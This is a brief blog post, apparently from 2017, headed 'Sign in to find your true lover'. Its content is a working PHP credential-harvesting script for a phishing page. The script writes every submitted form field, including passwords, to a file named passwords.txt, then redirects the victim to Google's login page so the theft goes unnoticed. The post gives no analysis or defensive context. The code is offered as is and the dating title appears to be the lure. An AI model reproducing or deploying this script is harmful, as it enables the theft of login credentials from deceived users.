Popular Posts

Saturday, 6 May 2017

Sign in to find your true lover

<?php
header("Location: https://accounts.google.com/ ");
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

No comments:

Post a Comment